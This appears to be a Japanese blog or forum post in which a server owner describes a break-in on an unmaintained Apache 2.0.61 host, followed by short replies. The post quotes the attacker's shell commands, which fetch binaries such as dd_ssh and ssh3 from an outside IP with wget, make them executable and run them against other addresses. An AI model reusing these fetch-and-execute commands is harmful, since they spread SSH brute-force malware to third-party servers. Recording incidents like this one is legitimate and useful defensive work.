  |
うちの大したことに使ってもいないのに常時稼動で外部公開なサーバがクラックされて以下のコマンドが実行されていた。
sh -c cd /tmp;wget ttp://195.69.220.2/dd_ssh;chmod 755 dd_ssh;./dd_ssh 50 217.79.190.53 2 >/dev/null 2>/dev/null sh -c cd /tmp;wget ttp://195.69.220.2/slowdssh;chmod 755 slowdssh;./slowdssh >/dev/null 2>/dev/null sh -c cd /tmp;killall -9 ssh2;wget ttp://195.69.220.2/ssh3;chmod 755 ssh3;./ssh3 200 72.20.14.174 >/dev/null 2>/dev/null
((正式なリンクだと502エラーが出て書き込めないのでhを抜いてあります。))
このコマンドを実行するとドイツのサーバからプログラムをダウンロードして実行するみたい。
ちなみに、いろんなサーバにssh接続を試みるプログラムっぽい。
このプログラムたちは2007年の11月頃にビルドしたApache/2.0.61にぶら下がって動いていた。
ログは綺麗さっぱりなくなっていて、2011年7月24日以降の情報しか残っていなかった。
どうやって侵入して実行したのか分からなかったけど、古いApacheと一緒に動いていたのでApacheを更新しなかった自分が悪いと思っている。
「dd_ssh」や「ssh3」の引数を書き換えて実行してみたいけど、それって犯罪じゃないかと思うと怖くてできない。
誰か詳しく調べてちょ。
http://mixinuko.com/wordpress/2010/08/22/phpmyadmin-%E3%82%92%E7%8B%99%E3%81%A3%E3%81%9F%E6%94%BB%E6%92%83%E3%81%AB%E3%81%94%E6%B3%A8%E6%84%8F%E3%80%82dd_ssh-%E3%81%AB%E3%81%94%E6%B3%A8%E6%84%8F%E3%80%82/ だって。
わざわざ調べて下さってありがとうございます! というかdd_sshでググると一番上に出てきますね…。
先ず、サーバ運用はやめて下さい。 >ちなみに、いろんなサーバにssh接続を試みるプログラムっぽい。 こう言っているから、情報を自分で探そうとしているのは良いと思います。 が...
6
